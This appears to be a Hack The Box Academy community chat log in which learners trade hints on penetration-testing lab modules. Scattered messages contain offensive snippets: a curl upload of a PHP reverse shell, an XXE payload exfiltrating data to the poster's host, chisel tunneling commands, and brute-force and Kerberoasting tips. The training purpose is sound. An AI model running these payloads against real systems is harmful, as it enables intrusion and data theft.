#modules

In different applications

Ok checking it

Can i pasteca screen shot of log here

try something simpler first, like a webshell. validate your hypothesis. then, what can you do with a webshell and command execution?

Having issues downloading the flag on teir 0 module 2 'Fawn" idk if it's a issue but it denies me permission

anyone know by chance?

You need to put /hijacking after the IP address in the browser

You need to verify your HTB account

For screebshots

Fawn is a starting point machine not academy module, read #welcome once you do and follow the steps you should have access to #starting-point

Thank you

Got this. Fixed my problem. It was copy paste issue

How may i verify the account can you guide please

#welcome

It requires an account on app.hackthebox.com

(yes two separate logins)

Hi, I'm having issues with the File Upload Attacks module, specifically with the Upload Exploitation section. I can't get the PHP reverse shell I uploaded to connect to my port on the attacking machine.

I have made sure that the IP and port I provide are correct and that the port I listen on with nc is the same as in the script. The pentestmonkey script and the one generated by Metasploit in the module haven't worked for me.

I've been stuck here for about a month and I don't know what else to do. Any ideas or if someone has experienced a similar issue, how did you solve it?

do you have a firewall setup

a month? thats too long. dm me.

I use ufw status and return inactive.

OK

sounds like @mystic light will be able to help 😄

but lmk if you need additional help, a month is too long

Hey does anyone have some good tools for working with keepass? I don't need to crack the password just wondering if there are some cli stuff to work with the db.

https://keepass.info/help/base/cmdline.html

cool i just finished the introduction to htb, where should i start learning next?

https://academy.hackthebox.com/paths -> Information Security Foundations path

Oh that's great! Thank you very much!

Do you know how to work with a vhd file?

it's for a virtual machine

I am trying to mount it for the Password attacks lab -hard.

I am using kali

Just mount it on a Windows VM, you'll save yourself a lot of trouble..

Hint : it's a windows file that's protected

Yep

I will try windows and I think that john cracked the password.

Much easier to mount on a win VM

Or windows system

Hi, I'm in the 'Attacking Common Services' module in the 'DNS Attack' section. I managed to obtain the subdomain 'h?.inlanefreight.htb', but I need some help because when I execute the command 'dig AXFR @h?.inlanefreight.htb inlanefreight.htb', I get the following result: 'dig: unable to get address for 'h?.inlanefreight.htb': not found'. 🙂

Because you need to dig @ ip subdomain

Thank you so much @fathom pendant i got the flag

worked like a charm

This isn't the place to ask please read #rules and #welcome ; if it's a live ctf challenge usually it's against rules to get outside help. If you have peers doing the challenge, ask them

everybody is different

every module is different 😛

don't worry about how fast you get through a module

just make sure you are understanding everything

Using SSH for the first time got me feelin different 💀

hey guys im on password attack module attacking ad & ntds sectin

i make a user files and they look like this

but when i run it i get this everytime

is this how its supposed to be?

You should specify the absolute path ./names.txt and you are missing the -p flag before your passwords wordlist

yeah the password was the mistake only here

thanks ill try rn

yep that was the prob, thanks!

Does anyone have insight on the RDP and SOCKS Tunneling with SocksOverRDP module? I'm trying to run the SocksOverRDP-Plugin.dll from the Windows machine, but the file automatically deletes after it is extracted from the .zip file. I checked Windows Defender and it is turned off.

It's bad to base your personal performance and progress based on others. However long it takes you to grasp a concept is fine. Sometimes it's a wording issue with the question that leaves you a tiny bit confused

h

If you still need help, feel free to dm

make sure you are using an elevated prompt

I’m sure I’m missing something obvious, but I’m having issues figuring out the password for the ssh account in the Skills Asignment-Pivoting, Tunneling, and Port Forwarding module. I read the for-admin-eyes-only file, but the phrase in the file isn’t the password for ssh. I tried logging into ssh using the id_rsa file and the provided username, but that doesn’t work either.

Never mind. I figured it out.

Account Verified. Many Thanks @fathom pendant

what is the event about?

hello guys, can I dm someone to help me with Exploiting Web Vulnerabilities in Thick-Client Applications in the **Attacking Common Applications ** module ?

this is the last section i have left and i can't finish it 👺

Hello ! I need help on putting a webshell on the module "Attacking Common Services" on section easy lab "Attacking Common Services - Easy"
So I sent my webshell in PHP and even in ASPX (shell.php and shell.aspx) on the TARGETIP/xampp\htdocs\shell.php directory, and when I try to execute it via my browser it puts me a white page... can someone help me please?

I've struggled on this part to. I've put multiple shells and reverse shells and none work.

Yeah right? 😢

If you figure out anything please let me know lol. That section haunts me in my sleep lol.

This section made me the same... dw I will let you know !

I did the first thick client if you need help with that one. The second one gave me errors.

like you I finished it, but i’m stuck at the second

verify your url, had the same yesterday 🙂

Congratz man I'm stuck for so long ! but what URL do i have to check? I sent my reverse shell to the target on https://TARGET/shell and on https://TARGET/xampp\htdocs\shell

curl -k -X PUT -H "Host: 10.129.203.7" -H "Content-type: text/php" --basic -u fiona:9*** -F 'fileX=@/usr/share/webshells/php/php-reverse-shell.php' https://10.129.203.7/php-reverse-shell.php I used this btw and in verbose mode it tells me it sent correctly and when I curl it it's ok !

I tried many webshells in php aspx and a reverse shell but I don't think this is the problem now

I'm blocked for days if anyone could help me.
The target is a windows using XAMPP APACHE.
I have the creds of a SMTP user.
I managed to upload files using curl -X PUT method using smtp creds
I have these info files found on the ftp server: cat WebServersInfo.txt
CoreFTP:
Directory C:\CoreFTP
Ports: 21 & 443
Test Command: curl -k -H "Host: localhost" --basic -u <username>:<password> https://localhost/docs.txt

Apache
Directory "C:\xampp\htdocs"
Ports: 80 & 4443
Test Command: curl http://localhost/test.php

cat docs.txt
I'm testing the FTP using HTTPS, everything looks good.

Can someone help me with broken authentication final skill assessment? I either didn't find the correct user name or role to access the admin panel

I'm taking notes in Notion, but I'm having a problem where the child node is aligned same with the parent node. Does anyone know how to fix this issue in Notion?

Nevermind, I found a hint in the forum

Nope. I'm using markdowns in Visual Studio Code

php shell should work, however I don't think the path you're accessing is the right one

Hi all, is there an admin I can talk to? It is pretty urgent

got a question....

I have tried "Linux Debian".After checking the hint, I typed penguin ....but all these are wrong

(why i cant upload a picture? (° ^ °〃)

alright, it's in "https://academy.hackthebox.com/module/15/section/35"

Not sure but in a professional setting notion wouldn't be allowed as it saves things to the cloud

Because you need to verify your HTB account via the steps in #welcome to send pictures (it's an anti-spam policy) ; im on mobile rn and don't feel like opening the link, what's the module and question?

hi, in the Bloodhound module, I'm almost certain I've got the correct answer for "Using BlueHound custom dashboard. Which computer has more Administrators?" but it's not accepted. my mistake; I re-ran sharphound and got a different answer that wasn't showing up before.

I also tried the path of Apache xampp server https://TARGET/xampp\htdocs\shell.php but white page when trying to access even with ?c=dir after php for injection... i'm still strying

Nice 🙂

i really dont know what to write.....

getting information on a command is "man [command]",
try getting information with "uname" command

he told me just type "uname -a"

and the hint is "it's the name of a bird"

i just..."what the hell (° ^ °〃)"

Oh ok it's this question, uname doesn't give the flavor of the system idk why, but every linux distribution like "Ubuntu" etc has a Animal SYMBOL

@iron canopy Helpful hints for the first thick client challenge on attacking common applications. when dumping the file pay special attention to what the TYPE and SIZE the file is. @modern epoch , pay attention to what the question is asking. for the flag? or password? or something else?

• Module: https://academy.hackthebox.com/module/80/section/782
• Issue: Cyberchef example link leads to an example where gzip doesn't work
• Solution: Gzip has to be manually removed and readded, or the linke to the HTB page to be updated

ohhhh really? thanks!

Hello Vivis! can I get some help as well on my section Attacking common services - Easy lab ?

I can try, I havent done it for a while. Whats the question?

before it I found a user password for ftp, smtp and mysql. so the goal was to find a way to send a webshell or reverse shell but i don't know why it makes a white page every time I navigate to it

Alright give me a minute to spin it up

I am blocked on this for days I would owe you money ! xD

Im going to dm yoou

lol no money tho

Attacking Common Applications - WordPress - Discovery & Enumeration

Hello guys, please, someone can give me a hint ??? on this question “Perform manual enumeration to discover another installed plugin. Submit the plugin name as the answer (3 words).”

enumerate the different pages

Well what you're accessing here is webroot/xampp/htdocs/shell.php.
I'd assume you want C:\xampp\htdocs\shell.php though, right?

I have some questions in module "ATTACKING COMMON SERVICES" in section "Attacking SQL Databases" can you send a DM to someone?

Sure. You can DM me if you still need help.

Can someone help me the question "What is the customized version of the POP3 server?"

I solved other questions in this section, but that I can not understand what question means....

Module: Footprinting
IMAP / POP3
Question: What is the customized version of the POP3 server?

Try the classic namp -sV, or banner grabbing

I tried... submitted version as answer... but not working...

try banner grabbing, you need a especific version vx.xxx

solved. Thanks

Im glad i can help you

Can someone help me? I have a problem in the Password Attcks (Pass the ticket from Windows). I cant connect to the RDP, this one specifically. I can connect to every other RDP or anything else. I dont know if in the only one with this problem. I already finished this module unless this content...

@west canopy can you confirm if this is just for this user

What's your command looking like?

hey guys im a beginner in hackthebox, can someone tell me what i need to learn and do in hackthebox to become better at cyber security and learn more

i have 0 knowledge, a friend of mine said use hackthebox to learn IT. but im a beginner and know nothing

the fundamentals of technology is important

check the hint

can you elaborate?

I didn't study the fundamentals courses on hack the box, so I can't speak, but working in the industry and knowing other people it was better to start with tryhackme.com

You have to know how a network works, an operating system, a database, programming in general, how the internet works, etc.
I highly recommend starting with tryhackme.com they have a lot of free stuff and it's also cheap and you'll learn everything from scratch.

This video https://www.youtube.com/watch?v=SFbV7sTSAlA change my life, i started because of this video

Thank you man, I want to learn alot, I have 2 years left to go to uni so I’m trying to prepare and know nothing on IT or cyber security. This will help a lot

There's a few ways to answer you can try connecting to it directly, or by running a version scan with nmap iirc

xfreerdp /v:{IP-MACHINE} /u:Administrator /p:AnotherC0mpl3xP4$$

/v: ?

Or /v{IP} because without the colon it will fail

yeah, im using that

mb

There are also intro to {service} modules afaik. Footprinting module deals a lot with connecting and handling/leveraging common services

Try putting the pass in quotes if it's still failing

still not working

Sometimes with special characters you may need to either put in quotes or use a backslash

For instance \$\$ because $ in bash indicates a variable call

ok, its working with '

thank you!!

Np :)

It helps to recognize certain characters as potential fuckery for commands

!,$,&,>,<,?

They may need to be escaped with a backslash

Or the whole string in quotes

' should always work. If you use " or no quotes at all, you need go escape special characters.

Someone nudge on Attacking Common Services - Easy? Got USN F* but can't brute-force password for FTP or pop3, I thought the hint was leaning towards SMTP server type deal -- Used PW.list and rockyou we're an hour in rn with 48threads

• Module: Insecure Token Handling (https://academy.hackthebox.com/module/80/section/784)
• Issue: link does not work (https://academy.hackthebox.com/course/preview/file-inclusion--directory-traversal)
• Solution: Replace with valid (e.g. https://academy.hackthebox.com/module/details/23?redirect_to_section=1494) link or remove the sentence "You can learn more and practice this attack by studying the File Inclusion / Directory Traversal module.".

#858470491676737536

--When I try ftp brute with medusa I keep getting Server 550 msg and brute-force stops

Hi, I have a question about If I want to start a capture without hostname resolution, detailed output, showing ASCII and hexadecimal contents, and take the first 100 packets; what are the switches used? Please answer in the order in which the switches are requested in the question.

I have tried several ways but I have no correct answer I have read the documentation.

Module Intro to Network Traffic Analysis

this fooled me for a bit. try reducing your threads when you attack ftp. -t 1

https://www.tcpdump.org/manpages/tcpdump.1.html

Gotcha, it's that even realistic though

Like is it realistic to ever need to brute force with -t1 because even with t-1 if account lockout is low it doesn't matter lol

@autumn pilot sudo tcpdump -rXX /tmp/capture.pcap Reading the recent documentation but I see why I have done the test and it does give me the correct information but at the time of the answer it is incorrect.

it is expecting one switch (parameter)

if you carefully read the question again, you will be able to find the answer using even with the manual that I've linked

@autumn pilot I think the answer I am applying is correct, what I think is wrong is how I am applying it.

if it is not getting accepted, then it is not the expected one

@autumn pilot You are right

yo

i mean... all ctfs are contrived examples based on real world misconfigurations, right? but account lockout is different than login throttling. throttling is reducing the amount of simultaneous or repeated attempts by rejecting new logins. where a lockout is "youve tried unsuccessfully too many times, an administrator must unlock your account (or wait an hour before the next attempt)."
i was managing a security team where a pentest was conducted and the attacking team just did a low and slow ping from various ip's, just under what would trip the account lockout. 3 here, 3 there, 3 there or whatever. they eventually found a valid password but were thwarted by MFA.
so there is utility to it, but i will concede that it is definitely a contrived example, and if your pw is in the ass half of rockyou, youre gonna be waiting around for a while.

noice

@autumn pilot I believe that when the questions are complex is when you learn to memorize concepts the most.

-t 4 is fine up to 16 iirc

good to know, i just reduced to 1 and did something else lol

Like if you wanted to sim rl... Then yeah you'd need to reset the lab a couple times

With -t1

shoutout to @mortal basin, this modules are dope

Hi all (my turn 🙂 ) Currently on the last official question on the Passwords Attack module on the passthehash section. The question is:

Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.

I am logged in as admin on RDP and have used Julio's hash (confirmed through mimikatz. I can get the command to execute on DC01 but don't get any reverse shell. Been on this for hours and tried a number of different rev shells:

Any help is appreciated

Someone PM a hint on getting the webshell on Attacking Common Services - Easy. Exploited FTP with USN and PSW and uploaded a shell (i think) and can't seem to get anything back from it

now that you discovered that password, throw it around to other services! maybe the user repeated it someplace else....

how'd you create that payload? what IP and port?

I have used the recommended revshells. My port is 4444 and the IP is my tun0

tun0 of your machine or some IP of the host you RDP'd to?

Sorry - my mistake - habit. The IP of the MS01 that I am RDP'd on to

well, which one?

Did I not just say? It's the ip of the target I'm currently rdp'd on to. Unless you want the actual ip address?

no no, run ipconfig. you'll figure out what I mean. a machine can have multiple IP addresses

Yes it can and it does. I did try the secondary IP address with no luck.

it problably in this subnet 172.16.5.0/23

DC = 172.16.1.10 2nd IP Client 172.16.1.5

it has a public IP address (the one they gave to you), and an internal one. DC01 is only able to reach the internal one, so you definitely need that one. should be like 172.16.x.x

If the internal IP doesn't work, dm me. I'll take a closer look then to figure out what else might have gone wrong

Just tried it with the internal IP with no luck.

ugh

I'm definite I tried it earlier as well

Let me DM you 🙂

If you have some time

sure 🙂

Hi, I'm having an issue in Bypassing Security Filters exercise of Web Attacks. It looks like the skill assessment is somehow broken. I'm supposed to put something in an filename input and press RESET. Looking at the call in BURP, the value in the filename is nowhere to be found.

Or maybe the wrong machine is spawned? It always shows me the flag from the previous exercise

The input and the button are in different forms 🤔

dont hit the button just hit enter. its just bad ui.

wtf

I'll try

I'm still lost. I found the method which isn't recognized as malicious request and expect now to see the flag file, but I don't

dm me we can jam on it, i just did it to refresh memory

thx

For the Skills Assignment-Pivoting, Tunneling, and Port Forwarding, how did you transfer mimikatz to the target pivot machine to dump the credentials? I tried scp from my attacking machine and using powershell from the target machine, but it doesn’t connect. I’m executing the commands using proxychains and am able to RDP to the target machine I found through autoroute.

It hasn't been updated in 4 years, whether it's archived or not, nothing has changed. There's also EyeWitness.

You can copy/paste if you're using xfreerdp.

I use gowitness. Works just fine.

aquatone isn't necessary ¯_(ツ)_/¯

when gowitness implemented the server feature

👌

someone else having connections issues with the academy?

same here "500 SERVER IS NOT FEELING WELL"

yup

Yeah I can't log in either

it's part of the box

haha

yup, same, error 500

makes me wonder if it was hacked

Hi every1 is there any issues with academy server >>>throwing http-code-500 ???

same here. can not do academy...:(((

same

same

keep trying

its just droping requests

up !

👍

Sheeesh

Is academy dashboard down for anyone else?

Nvm. I see some other people are

You're not alone

Looks like everyone is having the same issue 😅

Well anyways, how is everyone’s day/night going?

Pretty good. Just watchin Grimm atm

I feel like shit but it's kinda like a normal morning

AD Enumeration & Attacks - Skills Assessment Part I . I am having hard time with the question 6. It is asking t*** user's cleartext password. I am connecting MS01 with rdp over proxychains but when I try secretsdump.py and mimikatz.py I am getting this error

[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.5.50:445 <--socket error or timeout!
[-] [Errno Connection error (172.16.5.50:445)] [Errno 111] Connection refused

I tried both of these with chisel but non of them work ----./chisel.exe client -v 10.10.X.X:1234 R:socks ------- ./chisel.exe client 10.10.X.X:1234 R:139:127.0.0.1:139 R:445:127.0.0.1:445 R:3389:127.0.0.1:3389. Any ideas ?

is anyone having trouble with academy

i keep getting a 500 error

it happened to me

"server is not feeling well"

lol

its a funny error message

yep, lol

ironically i was feeling under the weather today

so now I feel like the universe is trolling me 😄

@woeful ermine @solar zodiac they are investigating

#general

ah

Informed the team, might take a minute due to the late hour

will share any updates when i hate them

Thanks.

https://check-host.net/check-report/fbad05ek564
DDoS?

doubt it, since that'd be time out errors, rather then 500

Will share what information i can when i have more

NMAP module from HTB Academy says an "NMAP Connect Scan (-sT) is also useful when the target host has a personal firewall that drops incoming packets but allows outgoing packets. In this case, a Connect scan can bypass the firewall and accurately determine the state of the target ports. "

I find this confusing because if the firewall drops incoming packets (the initial syn packet) then the firewall wouldn't send an outgoing (syn-ack) anyways. So why is it saying a connect scan can bypass a firewall?

Dans la chaleur, de la nuit 🤒

Anglais s.v.p?

Sorry

All good 🙂

Any updates on the 500? 🙂

oh nvm it's working now 😄

It works and then it doesn't

lol

I'm headed to bed hopefully won't be an issue tomorrow.

Hey all, just had a query with the SNMP Footprinting exercise which asks you to enumerate a script and submit its output as the answer, now I stumbled accross the answer by going for a walk, however I am curious how it's "meant" to be done. Can Braa be used to brute force OIDs for x.sh and can you then somehow execute a script from an OID.

Walk is intended answer route

oh it is? Cheers Marcie - just didnt seem to really 'match' what the question was hinting at

how to do this , i am using ffuf and seclists as a wordlists ----Don't forget to remove copyrights from the wordlist, they clutter the results!

vi <wordlist>

dd on comments

:wq

thanks

Hi guys please help me.. I have this weird problem in #WEB ATTACKS - Blind Data Exfiltration

I am able to get any file except from the file they asked for in the question...
What is missing??

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
<!ENTITY % remote SYSTEM "http://MY_IP:8000/327a6c4304ad5938eaf0efb6cc3e53dc.php">
%remote;
%oob;
%content;
]>
<root>&content;</root>

Dm me if you still need a hint

Dm me if you're still struggling. I can take a look

Hello guys i just have silly question is there a way i can know machine tags? for example MetaTwo has XXE, sqli etc? or if the machine has web app?

I'd assume what they mean by this is:
If a port is open, it will reply with an ACK. The firewall won't block that as it would be disrupting the service.
On other ports it'll drop the SYN, so nmap will get no reply. It'll then retry to rule out packet loss.
If it's no packet loss, you can safely assume the port is filtered or closed.

The firewall may also reply with some ICMP stuff, which nmap will once again interpret as port filtered.

%content is not referring to any thing i think

I am doing Kerberos attacks module, I am currently at the Kerberoasting question. What is Adam's password, a Kerberoastable account? I identified 3 user account.. but the Adam one. Can someone provide me with a nudge?

I think NPUser's is for ASREPRoasting, GetUserSPN is for Kerberoasting

ohhh shit 😂 @steady hawk Thanks! I used the wrong script 😁

Hello anyone could help me out with lfi module

sure, which section?

Automation one

Which question

I found the parameter and found many paths but I don't know how to get to race from there

Which question mate, then I can take a look at mine notes

Fuzz the web application for exposed parameters, then try to exploit it with one of the LFI wordlists to read /flag.txt

Use ||LFI-Jaddix|| wordlist ; )

That I did it I found many paths now what I think is go through log poisonning maybe?

Use that to read the flag ; )

Okay thanks a lot think I know what to do 😁

I thought it was the answer to this question, but it's not... sudo tcpdump -i eth0 -rXX /tmp/capture.pcap Given the capture file at /tmp/capture.pcap, what tcpdump command will enable you to read from the capture and show the output contents in Hex and ASCII? (Please use best practices when using switches) lol module tcpdump fundamentals

Can someone help me with the question I'm stuck

I gave you the link to the manual, you need a simple search to do

I´m reading the documentatio but it´s so hard 🙂

you can also use hexdump to look at pcap files

But it will display the content in hex ascii

i think you can decode it

The question itself is not difficult but I think the most complex thing is to make the correct practice, in the manual the -r switch says "Read packets from file (which was created with the -w option or by other tools that write pcap or pcapng files). The standard input is used if the file is ``"-'' and the switch XX When parsing and printing, in addition to printing the headers of each packet, it prints the data of each packet, including its link-level header, in hexadecimal and ASCII.

if you search for Hex and ASCII you will find the answer

-XX When parsing and printing, in addition to printing the headers of each packet, it prints the data of each packet, including its link-level header, in hexadecimal and ASCII.

And doing a correct practice of the switches would be sudo tcpdump -rXX /tmp/capture.pcap

close ||sudo tcpdump -Xr /tmp/capture.pcap||

isn´t correct

no yet

First it would be to read from the capture and then display the hex ascii content. 🙂

whyyyyyyy is good

@autumn pilot But I tried several times that command and I got failure

@autumn pilot I mean it should display the content first in hexa and ascii and then read the capture to display the content?

hi

this is the community for hackers?

The bytes of the capture is represented in hex and ascii

This is an Oprah Winfrey fan club 💪

?

guys is black arch better than kali

when it comes to pen testing/ hacking

Whatever you like best is what’s better

btw do you know any tool that is very secret or very low no. of people knew about that

Yeah sudo written in rust

btw im new in hacking world

if anyone can teach me something about hacking than it would be very good for me

also im planning to get a server and i wanna do some pen testing on it before i put it to acctual use

btw anyone knew how to hack any device without coming in contact with that device in physically

https://academy.hackthebox.com/

is this safe link?

Yes, it's the link to HackTheBox Academy

Sending malicious links isn't allowed ; )

Challenge accepted

@glacial hazel I think it's more like organizing the switches in order to execute them correctly because I've read a couple of times the manufacturer's documentation and it explains it in simple terms

What are you trying to do?

I´m learning tcp fundamentals

Module Intro to Network Traffic Analysis (fundamentals tcpdump)

Are you trying to display the contents of a pcap file in hex and ascii?

yes

hexdump -C <file>

Ok

It is a bit overwhelming all the information because I have to study it little by little.

yes 😛

I am now with the following question but I am thinking about how I should arrange the switches so that it accepts the response

sudo tcpdump -nvvXc 100 but so hard And yet the question indicates that they should be organized as requested in the statement.

This isn't a question in how to complete the activity just was curious about getting to the answer. In the Password Attacks - Credential Hunting in Linux ||why are the creds you are looking for contained in someone else's personal configs? i feel like the activity took me longer because the last place i'd think to look for user B's creds is in user A's personal configs. I guess in the future i should assume someone's creds could be in anyone's personal configs||

Shared creds. Sometimes leaps of logic are required to connect to things. But on a logical side of things: say user A is an IT admin, it would make sense for them to have other user creds in order to verify they work in the event that user B loses them and needs a new copy

also humans just be dumb and its not weird for coworkers to have each others passwords even if theres no actual good or authorized reason for them to have it

"Hey I know youre out of town but I need that file you were working on."
"Np, password is P@$$w0rd! lol"
"Thanks! I wrote it down just in case!'
"Sounds good 👍"

^

Even when things are explicitly against policy, humans go "lol ok but I need this done"

💀

im on attacking module and on creds harvestinw indows

i am supposed to transfer a file from a attack host to target

through rdp, im on remmina rn and idk how to do it

cant finda any potions

options

i can use smbserver.py but i wanna see how to do it through rdp

thanks :D

Not sure with remmina but iirc if you add, /drive:<any name>,<full filepath or ./ For current> to mount a share when you connect

But I'm sure there's a Remmina option to mount a filepath

With xfreerdp*

Yeah there's an option in Remmina GUI "share folder"

I get that but ||everyone has their own mozilla profile where creds are stored. my reasoning was one user gave the other user creds to login but they saved the creds ||

Yes

¯_(ツ)_/¯

It happens dude

im on pw attack and on question find the default pw

for every new account

and i cant find s*it

i tried running the script

and the cmd

and looker around

but no lol

looked*

idk whatelse to do

pop a cmd prompt and run the onlineliner in the module.

Hello,I have a question about the "Skills Assessment - Using Web Proxies" module on CBBH path, last question I need to capture the request sent by Metasploit. I have no problem doing it with burp suite so i already have the answer, but i can't find a way to catch it with Owasp Zap, there is a previous exercise in the module where i had the same problem. Can't we do it with zap ? I enabled my 127.0.0.1:8080 proxy in zap options but nothing is captured when I run metasploit exploit.

guys hello ive just came here i need your helps immadeitly how can i delete my data from the internet

if i delete social media and email accs does that really deleted?

uh

Sounds like a question for reddit

Hey - So I think I know the answer but if a module is updated I need to complete to 100% again before I take exam once I'm completely done right?

Hi lads, if any one knows the answer for this, in evil-winrm when we execute the command "download" from target machine to download it to our attacker machine, i cannot seem to find the file in my attacker machine, any idea where it is actually downloaded?

I'd assume your current directory lol but you could just use the find command for it 🙂

Yea, it should be in the directory in which you launched evil-winrm from

yeah that is what i also know.. but it is just not there 😄

Where is it lol

nobody knows 😄

dog lol

upload works just fine.. like put the file in the same directory as evil-winrm and it uploads.. 😄

maybe check ls -alh or whatever and see if it's hidden for some reaosn

tried that as well , no luck in finding it 😦

this is not the first time i face this, it happen always.. download does not work accordingly

Either of you guys know this?

no idea

I'ts okay, Marcie here for the rescue 🙂

It's not really deleted. Digital footprints. But this isn't the place for that conversation please read #rules and #welcome you can ask in #1024429874246590575

You may be able to ask support about that one on the site. I think it heavily depends. But I think most of the updated modules are completable

I'm not familiar enough with winrm to help

It should be the filepath you're currently in

But Im not 100%

From documentation ```
Notes about paths (upload/download): Relative paths are not allowed to use on download/upload. Use filenames on current directory or absolute path. If you are using Evil-WinRM in a docker environment, bear in mind that all local paths should be at /data and be pretty sure that you mapped it as a volume in order to be able to access to downloaded files or to be able to upload files from your local host O.S.

That actually worked, using full paths, thanks Marcie!

Anybody know what's going on here?
I'm stuck on module ATTACKING COMMON APPLICATIONS: Splunk - Discovery & Enumeration

when I when to the Splunk's port it says "The connection was reset"

try https

oh thx

but what's the difference between using https and connecting directly?

https://academy.hackthebox.com/module/35/section/219

@acoustic owl you recently finished the NoSQL injection module, I'm hitting a blank on skill assessment 1. Any hint for what I should be doing?

Burp Intruder is a good friend in this case

Hrmm. I used that and I've got it to login, no issue, but just a bit puzzled as to what to do afterwards

Send me a DM

If you do it right, you should get the answer directly in Burp

i did

got bunch of crap

lol

doing AD: Living Off the Land

Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer.

any help ?

i go tbunch of cache files etc

I can take a look. Don't have notes on it, so give me a moment to recreate it

did you run it from C:\ and read all of the file names

sure thing

Hello everyone
Please help with the LINUX PRIVILEGE ESCALATION module .
I have a task where I need to find 2 files that contain SETUID bits and write them as an answer.
I found 2 files in the system, but only one is suitable, what am I doing wrong?

i havent ran from c:\

htb-student@NIX02:/usr/lib/snapd$ find / -uid 0 -perm -6000 -type f 2>/dev/null
/usr/lib/snapd/snap-confine
/usr/bin/facter
htb-student@NIX02:/usr/lib/snapd$

Help me please 😦

one is suid, one is sgid

And what do I need to do to get the second file?

read the module, understand the difference between suid and sgid, run the commands in the module. please read the questions carefully.

Hello, I am in the "KERBEROS ATTACKS" module, in the "Kerberos Authentication Process" section, regarding the (AP-REQ) Application Request part. I believe there is an error in the diagram: the content of the TGS (Ticket Granting Service) ticket is encrypted with the service key, not with the new user/service session key

i cant find bro, i tried couple there is hunderds of files in the output....

there is two questions in that section, you have found of one the answers, and don't forget to submit the answer as the full path

im stuck on this bs for like 2hrs

only on this q

OK, I'll try, thanks!!!!!!!!!

anything yet ?

its not bs. you arent reading the file names, my dude. this is what enumeration is. read everything, one will basically spell out its function.

yeah got it working. it ain't pretty but it works. feel free to dm me

yeah, i just get annoyed sm

because some sections though this path were really unnecessary complicated

and i get stuck for hours....

password attacks is one of the roughest modules fr

not only this one, but the other ones too in pentesting path...

i dont mind getting stuck and shit but sometimes its just too much

like it takes a day jsut to do one section...

ok dm me ill walk you through it

i found the pw

and youll slap yourself in the forehead im telling you

yeah bro it was the first one

its just i got like 1000 of them outputed

and i couldnt scroll all the way up

so i had to put that shi in the file and read it..

#858470491676737536

In the Active Directory Enumeration Module, Kerberoasting - from Windows section, I'm having issues with the following command: New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433"

PSArgumentException
TypeNotFound

zonetransfer.me is the domain from which you request a zone transfer and nsztm1.digi.ninja is the Nameserver that you request

@naive field fr... bt mostly its because maybe your machine got nothing to enough resources

im on pwnbox so ig yeah, makes sense

I bruteforced domain via dnsenum... but I can not find FQDN for .203.... Can someone give me hint or help me?

M: Footprinting(DNS)
Q: What is the FQDN of the host where the last octet ends with "x.x.x.203"?

if i remember you need to find the subdomain that allow a zone transfer, and then bruteforce this subdomain,and i think you can use the subdomains-top1million-5000.txt

spent a lot of time on this one ^^

Btw I have a question about the "Skills Assessment - Using Web Proxies" module on CBBH path, last question I need to capture the request sent by Metasploit. I have no problem doing it with burp suite so i already have the answer, but i can't find a way to catch it with Owasp Zap, there is a previous exercise in the module where i had the same problem. Can't we do it with zap ? I enabled my 127.0.0.1:8080 proxy in zap options but nothing is captured when I run metasploit exploit.

You could capture it with wire shark

well it work with burp suite, but i wanted to make it work with owasp zap too 😦

Use the smallest list. If you don't find anything with it, use the next bigger list

can't find the reason why

Two reasons
First, the number of requests to a DNS server may be limited.
Second, not every list contains every entry

@jaunty sail is talking about the reason why can't capture the request with zap 😛

oh, okay 😄

i started the http python server on my machine

but when i try to wget from ssh i get this

wtf

what command did u use to start the server

its working now

based

idk what the prob was :D

thanks anyways

Default port is 8000 if you just ran python3 -m http.server. I was going to say it looks like you might have forgotten http://IP:port/

yeaah that was the prob i think

thanks

!!

i kinda feel like im the most boring person in this channel xd

i ask all the time..

Nah, it's a learning experience, so don't be a afraid to ask. But if you can google it first and try to find it, that's worth it's weight in the skill. I'd say figuring out how to google things the right way can really come in handy in the future.

yeah, i just feel i get stuck a lot more than other ppl here :D

Is the 1'000 cube (approx. 90$) justified for the OSINT corporate Records course? Anybody would recommend or think there is similar but cheaper material?

Hmmm I did PowerView module.. it’s decent but tbh I expected a little bit more from it

If it bothers you at all you should ask yourself why you get stuck. It sounds stupid, but that's how I approach things now. Like if you do an AS-REP roast. Why will it work on one account vs another? What's the setting that enables this and why would it be enabled? Why is it valuable finding? Sometimes you just have to go out and research the concept despite the material you're provided in academy.

Module Active Directory PowerView
Section Enumerating AD Groups
Q. Find the member of the Remote Management Users group on WS01

.\SharpView.exe Get-NetLocalGroupMember -ComputerName WS01

Doesnt show members of Remote Management Users

Tried using a different approach

.\SharpView.exe Get-NetGroupMember -GroupName "Remote Management Users" -ComputerName WS01

Still no result

Hi! Can anyone assist me with Predictable token reset? Currently stuck here. (Nevermind ❤️ )

One month a platium subscription and the price drops drastically 😉

@acoustic owl have you done that module? Active Directory Powerview

Yes

Can I DM you?

sure

#Windows Privilege Escalation
#Section: DNSAdmins
#Using Mimilib.dll
I've been able to recreate all of the examples in the lab. All except the Mimilib.dll method mentioned. I read the URL link provided, but it doesn't give much detail into this attack method other than mentioning kdns.c(adding system command). Am I supposed to compile this and run the binary on the host? Do I have to compile mimikatz and run it with a special command? Can anyone offer more details?

Anyone do the Network Enumeration with NMAP module yet? I'm stuck on the Firewall and IDS/IPS Evasion - Medium Lab

I can't make anything out of the Intercepting Web Requests section in Using Web Proxies. I can't seem to get Zap to work at all and when I try to forward requests in Burp Suite, nothing happens. Anyone else run into these issues in this section?

It just keeps taking me back to hitting the ping button and when I change the 1 to ls and hit forward, it's just a blank window.

I tried in the pwnbox as well and it does the same thing.

You still need help?

Yes

This one is deceptive. It's a lot simpler than you think too. You're probably using -sS and -sV but think about what DNS runs on. It can run on two types of protocols. One which is connection oriented (TCP), and one other one. What's the other one?

UDO

-sU

UDP*

Give it a shot and see what happens. The only way you'll know

Its just stuck right now lol
└──╼ $sudo nmap -sU 10.129.2.48
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-30 19:59 EDT

